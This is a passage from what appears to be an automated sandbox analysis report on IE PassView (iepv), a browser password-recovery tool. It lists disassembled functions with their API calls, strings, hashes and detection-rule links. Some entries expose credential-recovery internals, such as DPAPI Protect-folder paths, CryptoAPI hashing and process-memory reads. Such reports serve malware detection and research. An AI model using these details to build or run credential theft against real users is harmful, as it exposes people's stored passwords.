                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004011D1
                                        • GetModuleHandleA.KERNEL32(00000000,?,?), ref: 004011DA
                                        • LoadCursorA.USER32(00000000,00000067), ref: 004011E3
                                        • SetCursor.USER32(00000000,?,?), ref: 004011EA
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040120A
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401217
                                        • GetDlgItem.USER32(?,000003EC), ref: 00401231
                                        • SetBkMode.GDI32(?,00000001), ref: 0040123D
                                        • SetTextColor.GDI32(?,00C00000), ref: 0040124B
                                        • GetSysColorBrush.USER32(0000000F), ref: 00401253
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401273
                                        • EndDialog.USER32(?,00000001), ref: 0040129E
                                        • DeleteObject.GDI32(?), ref: 004012AA
                                        • GetDlgItem.USER32(?,000003ED), ref: 004012CE
                                        • ShowWindow.USER32(00000000), ref: 004012D7
                                        • GetDlgItem.USER32(?,000003EE), ref: 004012E3
                                        • ShowWindow.USER32(00000000), ref: 004012E6
                                        • SetDlgItemTextA.USER32(?,000003EE,00412288), ref: 004012F7
                                        • SetWindowTextA.USER32(?,IE PassView), ref: 00401305
                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040131D
                                        • SetDlgItemTextA.USER32(?,000003EC,?), ref: 0040132E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                        • String ID: IE PassView
                                        • API String ID: 829165378-138957450
                                        • Opcode ID: b4c16071b9a7532792fcb4d9f5e964cc282a1dde44ff47dac44f1ca561dbac0a
                                        • Instruction ID: 2d723202b3b5cca2a5e2e0ea46cc793fd76a0364fe4b2736696fc3227fcf8ec2
                                        • Opcode Fuzzy Hash: b4c16071b9a7532792fcb4d9f5e964cc282a1dde44ff47dac44f1ca561dbac0a
                                        • Instruction Fuzzy Hash: D351B330500208BFEB225F61DE85FAE7BA6EB04700F10893AF955BA5F0C775AD61DB09
                                        Function 0040A56E Relevance: 44.1, APIs: 21, Strings: 4, Instructions: 306windowstringregistryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004077E7: LoadMenuA.USER32(00000000), ref: 004077EF
                                          • Part of subcall function 004077E7: sprintf.MSVCRT ref: 00407812
                                        • SetMenu.USER32(?,00000000), ref: 0040A6CF
                                        • 6F5894F0.COMCTL32(50000000,0040E470,?,00000101), ref: 0040A6EA
                                        • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040A708
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040A70D
                                        • LoadImageA.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 0040A71E
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040A758
                                        • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 0040A783
                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000001), ref: 0040A7EC
                                        • LoadIconA.USER32(00000000,00000066), ref: 0040A7F5
                                        • SetFocus.USER32(?,?,/noreg), ref: 0040A86A
                                        • GetFileAttributesA.KERNEL32(004125A8,?,/noreg), ref: 0040A884
                                        • GetTempPathA.KERNEL32(00000104,004125A8,?,/noreg), ref: 0040A894
                                        • strlen.MSVCRT ref: 0040A89B
                                        • strlen.MSVCRT ref: 0040A8A9
                                        • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040A8F6
                                        • SendMessageA.USER32(?,0000104E,00000000,00000000), ref: 0040A920
                                        • SendMessageA.USER32(00000000,00000403,00000002,0000FFFF), ref: 0040A933
                                        • SendMessageA.USER32(?,00000403,00000003,0000000A), ref: 0040A93D
                                        • SendMessageA.USER32(?,00000403,00000001,0000000A), ref: 0040A947
                                          • Part of subcall function 00403FEE: strlen.MSVCRT ref: 0040400B
                                          • Part of subcall function 00403FEE: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 0040402F
                                        • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040A968
                                        • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040A97C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: MessageSend$HandleLoadModulestrlen$Menu$AttributesClipboardCreateF5894FileFocusFormatIconImagePathRegisterTempWindowsprintf
                                        • String ID: /noreg$SysListView32$commdlg_FindReplace$report.html
                                        • API String ID: 478718253-3205826372
                                        • Opcode ID: ecf2ce4abb139d9e1560520fc5a074635b50365801fe6e54e165574c8d11df66
                                        • Instruction ID: c7d200016f375faa40e5c412c0c460c7da11ca212d389b44d4b46c1aacdb66f9
                                        • Opcode Fuzzy Hash: ecf2ce4abb139d9e1560520fc5a074635b50365801fe6e54e165574c8d11df66
                                        • Instruction Fuzzy Hash: 18C1E171505388AFEB129F65CC8ABCE7FA5AF14300F044479FA48BB2D2C7B55518CBA9
                                        Function 0040BBF4 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 213windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EndDialog.USER32(?,?), ref: 0040BC3C
                                        • GetDlgItem.USER32(?,000003EA), ref: 0040BC54
                                        • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040BC73
                                        • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040BC80
                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040BC89
                                        • memset.MSVCRT ref: 0040BCB1
                                        • memset.MSVCRT ref: 0040BCD1
                                        • memset.MSVCRT ref: 0040BCEF
                                        • memset.MSVCRT ref: 0040BD08
                                        • memset.MSVCRT ref: 0040BD26
                                        • memset.MSVCRT ref: 0040BD3F
                                        • GetCurrentProcess.KERNEL32 ref: 0040BD47
                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040BD6C
                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040BDA2
                                        • memset.MSVCRT ref: 0040BDDD
                                        • GetCurrentProcessId.KERNEL32 ref: 0040BDEB
                                        • memcpy.MSVCRT(?,00411F30,00000118), ref: 0040BE1A
                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040BE3C
                                        • sprintf.MSVCRT ref: 0040BEA7
                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040BEC0
                                        • GetDlgItem.USER32(?,000003EA), ref: 0040BECA
                                        • SetFocus.USER32(00000000), ref: 0040BED1
                                        Strings
                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040BEA1
                                        • {Unknown}, xrefs: 0040BCB6
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                        • API String ID: 1428123949-3474136107
                                        • Opcode ID: 7373fe983fa7d826f3d98fdd397c2cbd796ef5b67f241b84af1fafadaa8bf6c4
                                        • Instruction ID: ab82093e82b0dc2be47d1e4c554b5134929d62590cb0d9f559d066302e60e584
                                        • Opcode Fuzzy Hash: 7373fe983fa7d826f3d98fdd397c2cbd796ef5b67f241b84af1fafadaa8bf6c4
                                        • Instruction Fuzzy Hash: F571ABB2404248BFD7219F51DC45EEB7B9CEB44344F00443EF648A21E1D735A919DBAE
                                        Function 0040D14B Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _mbscat$memsetsprintf$_mbscpy
                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                        • API String ID: 633282248-1996832678
                                        • Opcode ID: 454e3b97b3d028b6050df625e5cdfdacca5a384f5c085efc3af82c9e53fef484
                                        • Instruction ID: 4b6673b6d978c94f635e7920ddbb95c6d9023c96c3e466d0fab0bc554a397e0a
                                        • Opcode Fuzzy Hash: 454e3b97b3d028b6050df625e5cdfdacca5a384f5c085efc3af82c9e53fef484
                                        • Instruction Fuzzy Hash: 7231BBB2C05215BFD724AAD49C82D9AB35C9F10365F1041BFF914B21C2DB7CAA8C8B5D
                                        Function 00408F62 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00408F82
                                        • memset.MSVCRT ref: 00408FA5
                                        • memset.MSVCRT ref: 00408FBB
                                        • memset.MSVCRT ref: 00408FCB
                                        • sprintf.MSVCRT ref: 00408FFF
                                        • _mbscpy.MSVCRT(00000000, nowrap), ref: 00409046
                                        • sprintf.MSVCRT ref: 004090CD
                                        • _mbscat.MSVCRT ref: 004090FC
                                          • Part of subcall function 0040D096: sprintf.MSVCRT ref: 0040D0B5
                                        • _mbscpy.MSVCRT(004093B4,?), ref: 004090E1
                                        • sprintf.MSVCRT ref: 00409130
                                          • Part of subcall function 004054A8: strlen.MSVCRT ref: 004054B5
                                          • Part of subcall function 004054A8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040918C,?,<item>), ref: 004054C2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                        • API String ID: 710961058-601624466
                                        • Opcode ID: 503ee7d79ae4fec1e096e4d24a48d019df390286079e467b253fdb3b37d063dc
                                        • Instruction ID: 1fb9cbf94fbf9db8d6d6d563c050f411e0517f3dea1d4c0cd6346e753d28852d
                                        • Opcode Fuzzy Hash: 503ee7d79ae4fec1e096e4d24a48d019df390286079e467b253fdb3b37d063dc
                                        • Instruction Fuzzy Hash: 1961BF31900208AFDF14EF95CC86EDE7B79EF04314F1001AAF918BA2D2DB39AA45CB55
                                        Function 0040D268 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: sprintf$memset$_mbscpy
                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                        • API String ID: 3402215030-3842416460
                                        • Opcode ID: 7e76d5a04eef2a531a64342e17b0c3fc78b35fcee9df5c805667bda5edc55b22
                                        • Instruction ID: cb7c4f64b5ee6ae6c3203d53366d56183c9d72d71c58fbd2a4889d1051ba2003
                                        • Opcode Fuzzy Hash: 7e76d5a04eef2a531a64342e17b0c3fc78b35fcee9df5c805667bda5edc55b22
                                        • Instruction Fuzzy Hash: 534124B2C0111D6ADB21DA95CC81FEB776CAF14319F0401B7B918F21C2E6389B5D8B65
                                        Function 0040B784 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _strcmpi
                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                        • API String ID: 1439213657-1959339147
                                        • Opcode ID: 10e8d8571f25f0fca3a519c2fd4170dcdca92cdeebca7750479ab782993dd494
                                        • Instruction ID: 20a6fcd9a940255a688d7b0250f2248a35fc65a577c324fc704e39fb8d27135f
                                        • Opcode Fuzzy Hash: 10e8d8571f25f0fca3a519c2fd4170dcdca92cdeebca7750479ab782993dd494
                                        • Instruction Fuzzy Hash: 79010C6269931238F86422A72D17B470A49CB91B7AF71993FF514F80D9EF7C500450AD
                                        Function 0040331C Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040705C,?,00000104,00000000,?,?,004025EE,?,00000000), ref: 00403327
                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0040333B
                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403347
                                        • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403353
                                        • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 0040335F
                                        • GetProcAddress.KERNEL32(?,CryptHashData), ref: 0040336B
                                        • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403377
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                        • API String ID: 2238633743-1621422469
                                        • Opcode ID: 6c79e390df775d539c368336c2ecfa3f2549874e9245ec2e66bc54a96e53f201
                                        • Instruction ID: 8e0dd15aec38e0fd7c38dc5f5a73f20ec7812c2ba6613e422e05b2acbdc7fbab
                                        • Opcode Fuzzy Hash: 6c79e390df775d539c368336c2ecfa3f2549874e9245ec2e66bc54a96e53f201
                                        • Instruction Fuzzy Hash: C5F0A975940744AEDB307F779D09E06BEE1EFA87017218D3EE1D163690D6B99060CF45
                                        Function 00402C18 Relevance: 24.2, APIs: 12, Strings: 4, Instructions: 150stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004033B4: strlen.MSVCRT ref: 004033D2
                                          • Part of subcall function 004033B4: strlen.MSVCRT ref: 004033DF
                                          • Part of subcall function 004033B4: strlen.MSVCRT ref: 0040340F
                                          • Part of subcall function 004033B4: strlen.MSVCRT ref: 0040341D
                                        • memset.MSVCRT ref: 00402C54
                                        • memset.MSVCRT ref: 00402C6B
                                        • memset.MSVCRT ref: 00402C82
                                        • memset.MSVCRT ref: 00402C99
                                        • strlen.MSVCRT ref: 00402CAD
                                        • strlen.MSVCRT ref: 00402CBB
                                        • strlen.MSVCRT ref: 00402CEA
                                        • strlen.MSVCRT ref: 00402CF8
                                        • strlen.MSVCRT ref: 00402D27
                                        • strlen.MSVCRT ref: 00402D35
                                        • strlen.MSVCRT ref: 00402D64
                                        • strlen.MSVCRT ref: 00402D72
                                          • Part of subcall function 00405918: _mbscpy.MSVCRT(?,?,?,00403438,?,Application Data\Microsoft\Protect,?,?,?,00000000,00402C40,?), ref: 00405920
                                          • Part of subcall function 00405918: _mbscat.MSVCRT ref: 0040592F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: strlen$memset$_mbscat_mbscpy
                                        • String ID: AppData\Local$AppData\Roaming$Application Data$Local Settings\Application Data
                                        • API String ID: 2399022799-1616091409
                                        • Opcode ID: 3be53faf8907f854b252f09969c909306221ba75ca6a754eabe49422fde229f1
                                        • Instruction ID: 0aa79fb4c3caf9cdf13b794d92e13ff8df788c9497b0bc208439cc72e661e6b2
                                        • Opcode Fuzzy Hash: 3be53faf8907f854b252f09969c909306221ba75ca6a754eabe49422fde229f1
                                        • Instruction Fuzzy Hash: 7F51A7B150411CAADB15EB55CC85BDDB7ACAF04308F1004BBF508F61C2DBBC9B889B99
                                        Function 004026E2 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004054A8: strlen.MSVCRT ref: 004054B5
                                          • Part of subcall function 004054A8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040918C,?,<item>), ref: 004054C2
                                        • memset.MSVCRT ref: 0040271A
                                        • memset.MSVCRT ref: 0040272E
                                        • memset.MSVCRT ref: 00402742
                                        • sprintf.MSVCRT ref: 00402763
                                        • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 0040277F
                                        • sprintf.MSVCRT ref: 004027B6
                                        • sprintf.MSVCRT ref: 004027E7
                                        Strings
                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004026F2
                                        • IE PassView, xrefs: 004027CD
                                        • <table dir="rtl"><tr><td>, xrefs: 00402779
                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004027E1
                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00402791
                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040275D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$IE PassView
                                        • API String ID: 113626815-2840149160
                                        • Opcode ID: bb36ad5aa00d1c5d5c6db54a0930051e88cfaa18a912c190982c7715a2f9a6af
                                        • Instruction ID: 79ec9f827acb84f4e73bb674bc78c0bf489e66189f469c4492059895979903f2
                                        • Opcode Fuzzy Hash: bb36ad5aa00d1c5d5c6db54a0930051e88cfaa18a912c190982c7715a2f9a6af
                                        • Instruction Fuzzy Hash: BB3167B2C00118BADB64D795CC82EDE77ACEB04314F1045B7F908B31C1DA786BD88B69
                                        Function 0040C0C6 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(psapi.dll,?,0040C16C,0040BDC4), ref: 0040C0D9
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040C0F2
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040C103
                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040C114
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040C125
                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040C136
                                        • FreeLibrary.KERNEL32(00000000), ref: 0040C156
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                        • API String ID: 2449869053-232097475
                                        • Opcode ID: 8bae9f90865ef67b8577d95b1b06d497210238930ec4d9d0db7395eb778b4a76
                                        • Instruction ID: c87147c288e77a78077066b68bba7e28773a7c5f6cc3d20f75e2f18e7ded8720
                                        • Opcode Fuzzy Hash: 8bae9f90865ef67b8577d95b1b06d497210238930ec4d9d0db7395eb778b4a76
                                        • Instruction Fuzzy Hash: 6C018470505712DAC7219F28AE90B6B3FE89749B40F10453BE504F92E5DBBCC4468FAC
                                        Function 00402E5B Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 223COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcslen.MSVCRT ref: 00402E7D
                                        • memset.MSVCRT ref: 00402E9D
                                        • wcschr.MSVCRT ref: 00402F2C
                                        • wcsncmp.MSVCRT ref: 00402F45
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00402FC1
                                        • wcschr.MSVCRT ref: 00402FDF
                                        • wcscpy.MSVCRT ref: 00402FF5
                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,0000000C), ref: 00403006
